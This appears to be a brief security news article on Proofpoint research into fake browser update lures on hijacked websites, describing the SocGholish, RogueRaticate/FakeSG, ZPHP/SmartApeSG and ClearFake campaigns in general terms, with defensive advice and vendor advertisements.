Malware distribution on users’ computers is achieved through phony browser updates presented on websites that hackers have hijacked.
When a user visits a hacked website, they may see a message purporting to be from the browser’s developer (such as Chrome, Firefox, or Edge) advising them to update their browser.
The link leads users to download harmful software instead of a secure browser update.
Although Proofpoint has not identified any instances of threat actors distributing harmful links via emails, it has detected compromised URLs in email traffic through various means, owing to the complexity of the problem.
Attackers use various techniques to filter traffic in each campaign, making it difficult for researchers to detect and analyze. Despite the differences in methods, they are all effective at obfuscating the attack.
While this may limit the reach of the malicious payload, it also allows the attackers to maintain access to the compromised sites for extended periods.
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
SocGholish:
Over the course of several years, there have been various discussions centered around the dangers of fake browser update lures. Among the many threats discussed, SocGholish has been identified as the most prominent one.
RogueRaticate/FakeSG:
A fraudulent browser update initiative, named RogueRaticate or FakeSG, has been detected. This scheme involves the injection of complex, hard-to-read JavaScript code into already existing JavaScript files.
ZPHP/SmartApeSG:
ZPHP refers to a term initially introduced by Proofpoint or SmartApeSG to describe a specific operation. The operation involves inserting a small piece of script, commonly known as “inject,” into the HTML of a compromised website.
This script is used to carry out various tasks, and its insertion is often done without the knowledge or consent of the website owner.
ClearFake:
There have been ongoing campaigns about this cluster, and several changes have been noticed in the brief time that it has been under observation. The inject is a script inserted into the hijacked website’s HTML and encoded in base64.
Effectively detecting and preventing security threats can be a challenging task for any security team. To improve their chances of success, organizations can implement a multi-faceted approach that includes setting up network detections, utilizing the Emerging Threats ruleset, and implementing endpoint protection.
These measures can help to enhance the overall security posture of the organization and better safeguard against potential cyber threats.
Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Take advantage of the free trial to ensure 100% security.